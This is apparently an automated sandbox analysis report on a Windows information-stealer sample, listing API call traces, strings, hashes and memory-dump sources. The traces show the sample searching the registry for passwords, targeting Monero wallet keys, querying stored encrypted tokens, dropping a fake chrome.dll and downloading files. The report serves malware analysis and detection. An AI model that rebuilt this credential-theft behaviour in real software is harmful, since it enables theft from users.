                                        • Opcode Fuzzy Hash: 1c3e386dca8c1c5b3bbb258853d7959aedfa9b792e99b386f31315299e507f73
                                        • Instruction Fuzzy Hash: D8215CB1E44318ABDB10DFD5DD4AFAEBBB8FB44B00F104609F215BB280C77969008BA4
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                          • Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                        • InternetOpenA.WININET(00E30DFB,00000001,00000000,00000000,00000000), ref: 00E1615F
                                        • StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E16197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E161DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E16203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00E1622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E1625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00E16299
                                        • InternetCloseHandle.WININET(?), ref: 00E162A3
                                        • InternetCloseHandle.WININET(00000000), ref: 00E162B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 9ab24cac26fc6149b852954bebfa3ecd616372c447b167b0e60acd385e9d5c14
                                        • Instruction ID: d0a5086038f402ed960ea9f1516b2d57f66b0fd059a3492d0fa42aa7d0aa5b7c
                                        • Opcode Fuzzy Hash: 9ab24cac26fc6149b852954bebfa3ecd616372c447b167b0e60acd385e9d5c14
                                        • Instruction Fuzzy Hash: 365171B1A00218ABDF24DF94DC45BEE77B9AB44705F008098F605BB1C0DB75AAC9CF95
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 00E9024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 00E9035B
                                        • CatchIt.LIBVCRUNTIME ref: 00E903AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 00E904C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: 502696aaca0e10e22ca525dace578fd5f7b358abcaffa4a03df9ab9af7f2768a
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: 82B19D71800209EFCF25EFA4C8819AEBBB5FF04314F94616AE9297B252D731DA51CF91
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E17411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E174B2
                                        • HeapFree.KERNEL32(00000000), ref: 00E174B9
                                        • task.LIBCPMTD ref: 00E175B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: b22a6df25508b2fe2bf7cc03cc119f724e33ed27571d7634a8b6fe2014dffd92
                                        • Instruction ID: e65ab1f40a6b5b7880eb05dbe06f176563e77016eb37e5c464310052ce823e80
                                        • Opcode Fuzzy Hash: b22a6df25508b2fe2bf7cc03cc119f724e33ed27571d7634a8b6fe2014dffd92
                                        • Instruction Fuzzy Hash: DF614BB190426C9BDB24DB50CC55BDAB7B9BF48700F0081E9E689B6141EF706BC9CF90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E278C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E278CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,01A7BB78,00000000,00020119,Ix), ref: 00E278EB
                                        • RegQueryValueExA.ADVAPI32(Ix,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E2790A
                                        • RegCloseKey.ADVAPI32(Ix), ref: 00E27914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber$Ix
                                        • API String ID: 3225020163-4041952297
                                        • Opcode ID: 1a4dfbae7247c6f81322a61291635908a09a735aff8d6f9328d845ea5c7f1378
                                        • Instruction ID: fcfe41526257e84b7519a6e8e934d3257fbbeea03604742a3fd5689e236c0fee
                                        • Opcode Fuzzy Hash: 1a4dfbae7247c6f81322a61291635908a09a735aff8d6f9328d845ea5c7f1378
                                        • Instruction Fuzzy Hash: A70167B5E40309BFDB10DBD5EC4AFAEB7B8EB44B00F004598F645AB284D7759A40CB90
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        • lstrlen.KERNEL32(00000000), ref: 00E1BC6F
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E1BC9D
                                        • lstrlen.KERNEL32(00000000), ref: 00E1BD75
                                        • lstrlen.KERNEL32(00000000), ref: 00E1BD89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 8b395c854ddfd5e4dbdcc33a41225ca1b12b47610224f219ae42bdec4a7f0357
                                        • Instruction ID: 8cc5c6e92b9177407f415b557039d455fe382619ad6896b8fcb96906e015d8a8
                                        • Opcode Fuzzy Hash: 8b395c854ddfd5e4dbdcc33a41225ca1b12b47610224f219ae42bdec4a7f0357
                                        • Instruction Fuzzy Hash: 2BB164729101189BCF14FBA0EDA6EEE77B9AF54300F4855B8F50677091EF346A48CB62
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: dc8a1204710bba88a4bec6eacfeeddb3f630d1a975247bef181c2afbe3658851
                                        • Instruction ID: 41986f05c5ec2ed48afa181a384c9fadf2bac23b8795704514b1d79b8e14da09
                                        • Opcode Fuzzy Hash: dc8a1204710bba88a4bec6eacfeeddb3f630d1a975247bef181c2afbe3658851
                                        • Instruction Fuzzy Hash: 1EF08270A48309EFD3689FE6E40975CBBB1EF04B07F1142D9F649AE184D67A8A40DB91
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E29850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00E208DC,C:\ProgramData\chrome.dll), ref: 00E29871
                                          • Part of subcall function 00E1A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E1A098
                                        • StrCmpCA.SHLWAPI(00000000,01A88BD8), ref: 00E20922
                                        • StrCmpCA.SHLWAPI(00000000,01A88B98), ref: 00E20B79
                                        • StrCmpCA.SHLWAPI(00000000,01A88A48), ref: 00E20A0C
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E20C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 00E20C30
                                        • C:\ProgramData\chrome.dll, xrefs: 00E208CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: f7ad21a06effe724034e757aeb55710571a2632e43c77b86fb76149eef51d273
                                        • Instruction ID: 9cdb54074340fa3e03ba5a10e83b456264f9966852414128c17f8f48b70e77ad
                                        • Opcode Fuzzy Hash: f7ad21a06effe724034e757aeb55710571a2632e43c77b86fb76149eef51d273
                                        • Instruction Fuzzy Hash: D9A178717002089FCB28EF64D996EED77B6FF94300F54956DE40A6F282DA30DA05CB92
                                        APIs
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                        • wsprintfA.USER32 ref: 00E19E7F
                                        • lstrcat.KERNEL32(00000000,?), ref: 00E19F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 00E19F17
                                        • lstrcat.KERNEL32(00000000,00E312D8), ref: 00E19F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 00E19F7C
                                        • Sleep.KERNEL32(00001388), ref: 00E1A013
                                          • Part of subcall function 00E299A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E299C5
                                          • Part of subcall function 00E299A0: Process32First.KERNEL32(00E1A056,00000128), ref: 00E299D9
                                          • Part of subcall function 00E299A0: Process32Next.KERNEL32(00E1A056,00000128), ref: 00E299F2
                                          • Part of subcall function 00E299A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E29A4E
                                          • Part of subcall function 00E299A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E29A6C
                                          • Part of subcall function 00E299A0: CloseHandle.KERNEL32(00000000), ref: 00E29A79
                                          • Part of subcall function 00E299A0: CloseHandle.KERNEL32(00E1A056), ref: 00E29A88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 531068710-2746444292
                                        • Opcode ID: 3e3faabf22b1c210ff8b316809ec1266e77d855ec4a70c2bbe2a33b819d13928
                                        • Instruction ID: 2aa9f0b594b8aea0a1d05a7a79a3d86b2a421d0210de0dc1f6b32e39bac5d234
                                        • Opcode Fuzzy Hash: 3e3faabf22b1c210ff8b316809ec1266e77d855ec4a70c2bbe2a33b819d13928
                                        • Instruction Fuzzy Hash: 4751B3B1944318ABEB24DB60DC4AFDA77B8AB44704F044198F60DAB2C1EB75AB84CF51
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00E8FA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00E8FA27
                                        • _ValidateLocalCookies.LIBCMT ref: 00E8FAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00E8FADB
                                        • _ValidateLocalCookies.LIBCMT ref: 00E8FB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 3faec2afec08ec159764400bdc476d7a67b32e84aa91ff90d55b18ec48304992
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: 70419531A00119EFCF14EF68C884A9D7BF5BF45324F1491A5E81CBB352D7319905CB91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E1501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E15021
                                        • InternetOpenA.WININET(00E30DE3,00000000,00000000,00000000,00000000), ref: 00E1503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E15061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E15091
                                        • InternetCloseHandle.WININET(?), ref: 00E15109
                                        • InternetCloseHandle.WININET(?), ref: 00E15116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 966f158988b55b3f089d618d4f0b93eab698c488e31eda31856576f782b3786a
                                        • Instruction ID: 31c924e31ffedf81d994785d5c10cde3b71553b6386964c3441614754974a4d9
                                        • Opcode Fuzzy Hash: 966f158988b55b3f089d618d4f0b93eab698c488e31eda31856576f782b3786a
                                        • Instruction Fuzzy Hash: 523105B5A40218EBDB24CF94DC85BDDB7B5AB48704F1081D8FA09B7281C7756EC58F98
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E285B6
                                        • wsprintfA.USER32 ref: 00E285E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E2861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E28629
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,01A8EBC0,00000000,000F003F,?,00000400), ref: 00E2867C
                                        • lstrlen.KERNEL32(?), ref: 00E28691
                                        • RegQueryValueExA.ADVAPI32(00000000,01A8EDD0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E30B3C), ref: 00E28729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E28798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E287AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: b5ba04e7fea3352875499f12596404c3b685652bad992298427d28d32a5fab1c
                                        • Instruction ID: 4533d1112960dc0393dfb2759d3831de9174b72d039bbc80480c9f7a45d01832
                                        • Opcode Fuzzy Hash: b5ba04e7fea3352875499f12596404c3b685652bad992298427d28d32a5fab1c
                                        • Instruction Fuzzy Hash: F8214C71A0122CABDB24DB54DC85FE9B3B8FB48704F0081D9F249A6180DF75AA85CFD4
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E299C5
                                        • Process32First.KERNEL32(00E1A056,00000128), ref: 00E299D9
                                        • Process32Next.KERNEL32(00E1A056,00000128), ref: 00E299F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E29A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E29A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 00E29A79
                                        • CloseHandle.KERNEL32(00E1A056), ref: 00E29A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: e1f7c7c229fa835fdda28a318da8a8cee48d5055c0594dbb69b48ee96217ffc8
                                        • Instruction ID: 052b344ce212fa61e996e40ea48d95a0f8f04cbaf130e9eda27523d195ee89c9
                                        • Opcode Fuzzy Hash: e1f7c7c229fa835fdda28a318da8a8cee48d5055c0594dbb69b48ee96217ffc8
                                        • Instruction Fuzzy Hash: 7921FFB1900318EBDB35DF66E888BDDB7B5BB48704F1051C8E509AA284D7799E84CF90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E2783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,01A7BB78,00000000,00020119,00000000), ref: 00E2786D
                                        • RegQueryValueExA.ADVAPI32(00000000,01A8EDB8,00000000,00000000,?,000000FF), ref: 00E2788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E27898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 6bbfdac815c98a84553f7411b22e5193b4e0e7a6d21bd6d917ca3870052abdfd
                                        • Instruction ID: faacbc89e7c15e6979b50c281e576c8f1d6da9092033e00dfaf2741eb9895fcd
                                        • Opcode Fuzzy Hash: 6bbfdac815c98a84553f7411b22e5193b4e0e7a6d21bd6d917ca3870052abdfd
                                        • Instruction Fuzzy Hash: 52016775E44315FBE714DBD5ED49F6D77B8EB44B00F004098FA84AB284D7759940CB90
                                        APIs
                                        • CreateFileA.KERNEL32(>=,80000000,00000003,00000000,00000003,00000080,00000000,?,00E23D3E,?), ref: 00E2948C
                                        • GetFileSizeEx.KERNEL32(000000FF,>=), ref: 00E294A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 00E294B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID: >=$>=
                                        • API String ID: 1378416451-3543398223
                                        • Opcode ID: bf0b656c9b5bbfbd7eeb04f7bb61d8264c52be36c4c606679ecec545ca2a6114
                                        • Instruction ID: fa2cac9e173a32a6220d350068ffffc4cefa9d8e1393c58aac9e3368aeaffc38
                                        • Opcode Fuzzy Hash: bf0b656c9b5bbfbd7eeb04f7bb61d8264c52be36c4c606679ecec545ca2a6114
                                        • Instruction Fuzzy Hash: 7FF0A438E00308BBDB20DFB5EC88F9E77BAAB48704F10D594FA51AB184D67596018B80
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                        • LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 334d2e32598ca80df67824a649dddcaa399fc75e038bad6a28a46e6c7a15f3b6
                                        • Instruction ID: abbcbbacf178f820582ea4e548259568adf7185fe51347649e98cce4febb50a1
                                        • Opcode Fuzzy Hash: 334d2e32598ca80df67824a649dddcaa399fc75e038bad6a28a46e6c7a15f3b6
                                        • Instruction Fuzzy Hash: 85312EB4A01209EFDB14CFA4D845BEE77B5BF48704F148168F911BB284D774AA81CFA1
                                        APIs
                                        • lstrcat.KERNEL32(?,01A8EEA8), ref: 00E24A2B
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E24A51
                                        • lstrcat.KERNEL32(?,?), ref: 00E24A70
                                        • lstrcat.KERNEL32(?,?), ref: 00E24A84
                                        • lstrcat.KERNEL32(?,01A7A678), ref: 00E24A97
                                        • lstrcat.KERNEL32(?,?), ref: 00E24AAB
                                        • lstrcat.KERNEL32(?,01A8D918), ref: 00E24ABF
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E28F20: GetFileAttributesA.KERNEL32(00000000,?,00E11B94,?,?,00E3577C,?,?,00E30E22), ref: 00E28F2F
                                          • Part of subcall function 00E247C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E247D0
                                          • Part of subcall function 00E247C0: RtlAllocateHeap.NTDLL(00000000), ref: 00E247D7
                                          • Part of subcall function 00E247C0: wsprintfA.USER32 ref: 00E247F6
                                          • Part of subcall function 00E247C0: FindFirstFileA.KERNEL32(?,?), ref: 00E2480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
